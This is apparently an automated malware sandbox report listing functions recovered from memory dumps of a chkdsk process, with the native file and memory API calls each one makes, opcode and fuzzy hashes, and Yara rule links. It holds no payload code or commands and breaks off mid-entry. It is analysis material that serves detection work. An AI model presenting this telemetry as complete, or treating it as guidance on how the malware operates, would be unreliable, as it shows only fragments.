                                                                                                                    Function 0502C790 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,?,050274FC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,050274FC,?,00000000,00000060,00000000,00000000), ref: 0502C7DD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                    • Instruction ID: 8bf40efd17459b45d58c45f74d99498bc6cff3657a5569a16cf479badfec4a2a
                                                                                                                    • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                    • Instruction Fuzzy Hash: 98F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630F8518BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502C840 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(050276C0,05022B88,FFFFFFFF,050271B3,00000002,?,050276C0,00000002,050271B3,FFFFFFFF,05022B88,050276C0,00000002,00000000), ref: 0502C885
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                    • Instruction ID: e5f76458661b38e27dfd8a3c9bd012c0fd95641354768af5c28bccd0ff96ed08
                                                                                                                    • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                    • Instruction Fuzzy Hash: 4FF0A4B2200208ABCB14DF99DC84EEB77ADAF8C754F118248BE0D97241D630F8118BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502C970 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,050117C4,00000004,00001000,00000000), ref: 0502C9A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                    • Instruction ID: 8a67da81f8cd5f501651db2293e2152831656ca237be734470773bfdd101448a
                                                                                                                    • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                    • Instruction Fuzzy Hash: 94F0AEB6210218ABCB18DF89DC85EEB77ADAF88754F118159FE099B241C630F911CBB5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502C890 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtDeleteFile.NTDLL(050274C2,00000002,?,050274C2,00000000,00000018,?,?,082AA4AB,00000000,?), ref: 0502C8B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4033686569-0
                                                                                                                    • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                    • Instruction ID: a160c16afcdcf1cf3f259c8635c01ea8f4247a78b6f4ab8d285fb192ee5c85b2
                                                                                                                    • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                    • Instruction Fuzzy Hash: F3D017722402146BD614EB98DC89ED77BACDF48760F118455BA1C5B241C630FA0187E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502C8C0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(0501E4E5,00000000,?,0501E4E5,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0502C8E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3535843008-0
                                                                                                                    • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                    • Instruction ID: 3cdf6936e7a7ce4105b0fb790c4eb29d2cb4655cef246472c8b9f919fa72e585
                                                                                                                    • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                    • Instruction Fuzzy Hash: ECD01772200214ABD614EBA8DC89EDB7BACDF48660F118455BA1C5B242C530FA0186E1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058934E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 406985e204786045e4c3fea11b7c30d3057f1719c32c95b26db42463c97c93ee
                                                                                                                    • Instruction ID: a8f6e35982182a2a248c2357ec11f3e484b2f5baae476eb861a112b86649ce28
                                                                                                                    • Opcode Fuzzy Hash: 406985e204786045e4c3fea11b7c30d3057f1719c32c95b26db42463c97c93ee
                                                                                                                    • Instruction Fuzzy Hash: 0F900232A0510402E50461584655706101587D0201FA1D815A5418568DCBA58D5579B2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 138ffffad43c4b1ee2ab8eed413a401ed5aac96946bbeada2f85dafad80289f8
                                                                                                                    • Instruction ID: 4ba0145d6957021fdce2d032fd169d87eba0816ce6a96fd8c0d12fa8fd649a6f
                                                                                                                    • Opcode Fuzzy Hash: 138ffffad43c4b1ee2ab8eed413a401ed5aac96946bbeada2f85dafad80289f8
                                                                                                                    • Instruction Fuzzy Hash: 4190027260100402E54471584545746001587D0301F91D415AA058554ECA698DD97A75
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8c0d7325f6dffe0a97c28ba190f2ccdbd288cd3e4f603b85faaa7f9f60b67b6f
                                                                                                                    • Instruction ID: e3bc829e92b4099cdb4d66439d773b3e8b4275d2b23cd460593bbb9853ac80ce
                                                                                                                    • Opcode Fuzzy Hash: 8c0d7325f6dffe0a97c28ba190f2ccdbd288cd3e4f603b85faaa7f9f60b67b6f
                                                                                                                    • Instruction Fuzzy Hash: FE90023260100413E51561584645707001987D0241FD1D816A5418558DDA668D56B531
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 56d3f5556460a422cd9665dede15565756c81de41fc7edc5277e30817382215f
                                                                                                                    • Instruction ID: c7f2d5b6d01ddb362305dd60a9e9ba447c640fdad1f56c6ea84ea0723dbe4b81
                                                                                                                    • Opcode Fuzzy Hash: 56d3f5556460a422cd9665dede15565756c81de41fc7edc5277e30817382215f
                                                                                                                    • Instruction Fuzzy Hash: 67900222642041526949B1584545507401697E0241BD1D416A6408950CC9369C5AEA31
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 9ea0718a8e34f914ef6fea7b7ed9d922646ba18a82ebde28d4cc3ad54f6c54c7
                                                                                                                    • Instruction ID: 4fd023418b05b814fa807ffa6a983dc3c59c784872bf654d642ab5c7c460ea75
                                                                                                                    • Opcode Fuzzy Hash: 9ea0718a8e34f914ef6fea7b7ed9d922646ba18a82ebde28d4cc3ad54f6c54c7
                                                                                                                    • Instruction Fuzzy Hash: 1790022A61300002E5847158554960A001587D1202FD1E819A5009558CCD258C6D6731
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2541ec109621eca15cbcc62cae0c13534c3a9dec4b2940866172033778b97685
                                                                                                                    • Instruction ID: 1455f098afc957b966c3d893654542a02887f37e23d30f813791370af983d0a5
                                                                                                                    • Opcode Fuzzy Hash: 2541ec109621eca15cbcc62cae0c13534c3a9dec4b2940866172033778b97685
                                                                                                                    • Instruction Fuzzy Hash: 9490022264100802E544715885557070016C7D0601F91D415A5018554DCA268D697AB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2e4123d197b78cc1fc527fc3a26d6c1f8c97d75b5e70e8e43d774f5199770afd
                                                                                                                    • Instruction ID: 3d6233eecb5a403b1ece2fee723cfc864753892315e643cf8e1aaca5ebd2c1ea
                                                                                                                    • Opcode Fuzzy Hash: 2e4123d197b78cc1fc527fc3a26d6c1f8c97d75b5e70e8e43d774f5199770afd
                                                                                                                    • Instruction Fuzzy Hash: 5990022261180042E60465684D55B07001587D0303F91D519A5148554CCD258C656931
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 7f67a86103054efc02c27a15291471d5517740af6ff11dfdc11217e26c35b290
                                                                                                                    • Instruction ID: ea2475e7156443132131494d533c99fc2f53bf3cfa4d391f45baf5ba4d72f5ac
                                                                                                                    • Opcode Fuzzy Hash: 7f67a86103054efc02c27a15291471d5517740af6ff11dfdc11217e26c35b290
                                                                                                                    • Instruction Fuzzy Hash: 7A90026274100442E50461584555B060015C7E1301F91D419E6058554DCA29CC567536
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058929F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 87462e06bc6d59ef7bd8f2c0fd94aaabac8806328fde7ead66ce4a1eb0e89b09
                                                                                                                    • Instruction ID: ba329b1f8f756884281c59cd7c2d6e4b37b6bd97d3ad560238ddb2d781c555c1
                                                                                                                    • Opcode Fuzzy Hash: 87462e06bc6d59ef7bd8f2c0fd94aaabac8806328fde7ead66ce4a1eb0e89b09
                                                                                                                    • Instruction Fuzzy Hash: CA900226611000031509A5580745507005687D5351791D425F6009550CDA318C656531
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5b278700fe8df708584a60cdba1e7a711d195def5b5a4e4b2937c36571f5fbd7
                                                                                                                    • Instruction ID: eeb5c6d1adaa907141e23936553d114098dd3a3809395a71240fa099b45807ac
                                                                                                                    • Opcode Fuzzy Hash: 5b278700fe8df708584a60cdba1e7a711d195def5b5a4e4b2937c36571f5fbd7
                                                                                                                    • Instruction Fuzzy Hash: 3490023260100842E50461584545B46001587E0301F91D41AA5118654DCA25CC557931
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 2fcc6698ecb3e20f23add860b4b88c37b39fd5f835b128a2e5d7109f048e13ad
                                                                                                                    • Instruction ID: a28c08043e80df0508fd0b4d107de761cfdd6320628f689999b011e07ee82d18
                                                                                                                    • Opcode Fuzzy Hash: 2fcc6698ecb3e20f23add860b4b88c37b39fd5f835b128a2e5d7109f048e13ad
                                                                                                                    • Instruction Fuzzy Hash: 3B90023260108802E5146158854574A001587D0301F95D815A9418658DCAA58C957531
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: bdd03b31815b5241b1619a01015901d5ed92f4643238b04adec42364d3db142b
                                                                                                                    • Instruction ID: 7c0a8e88dd5427d971d8b6b015042e329aedd52445cfb510ba3c1c1712958b1e
                                                                                                                    • Opcode Fuzzy Hash: bdd03b31815b5241b1619a01015901d5ed92f4643238b04adec42364d3db142b
                                                                                                                    • Instruction Fuzzy Hash: 9190023260100402E50465985549646001587E0301F91E415AA018555ECA758C957531
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: cf7d04bd7574cc6ec6c25b04b39603554881753b0bbd0aa08d69184131b6bf04
                                                                                                                    • Instruction ID: fcad1510087795d48df8cc6d5482fdbdf47f8371e760349ecaeca99f3683b916
                                                                                                                    • Opcode Fuzzy Hash: cf7d04bd7574cc6ec6c25b04b39603554881753b0bbd0aa08d69184131b6bf04
                                                                                                                    • Instruction Fuzzy Hash: 3990023260504842E54471584545A46002587D0305F91D415A5058694DDA358D59BA71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e67da0a96ef9dda746bacc310bcef39ea1a74cec56bd8dd07863023518883106
                                                                                                                    • Instruction ID: 70bfdc040a9dda9476f614f6e8b5ab8ce998808eb7d718004b32d34b459ddc00
                                                                                                                    • Opcode Fuzzy Hash: e67da0a96ef9dda746bacc310bcef39ea1a74cec56bd8dd07863023518883106
                                                                                                                    • Instruction Fuzzy Hash: AF90023260100802E5847158454564A001587D1301FD1D419A5019654DCE258E5D7BB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e0ec79ee74b5d97495ccce6fab6d74ff0487d73111440cdd7b407f31abea5fd1
                                                                                                                    • Instruction ID: 4ccf86e37f86694d24fea320bd637586cd0c66b5f0770cb5c94bcb8cff8ea115
                                                                                                                    • Opcode Fuzzy Hash: e0ec79ee74b5d97495ccce6fab6d74ff0487d73111440cdd7b407f31abea5fd1
                                                                                                                    • Instruction Fuzzy Hash: 2390026260200003550971584555616401A87E0201F91D425E6008590DC9358C957535
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 1cb5fe47c91682ebbaea5ca3e33eb1d6ba8351b09adade242d8137fc50d122cf
                                                                                                                    • Instruction ID: fad04b0112090ec8cbf4af323a9988bb91b73e49ad5e81b4ab6600362e448fc0
                                                                                                                    • Opcode Fuzzy Hash: 1cb5fe47c91682ebbaea5ca3e33eb1d6ba8351b09adade242d8137fc50d122cf
                                                                                                                    • Instruction Fuzzy Hash: C3900232A0500802E55471584555746001587D0301F91D415A5018654DCB658E597AB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05892A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
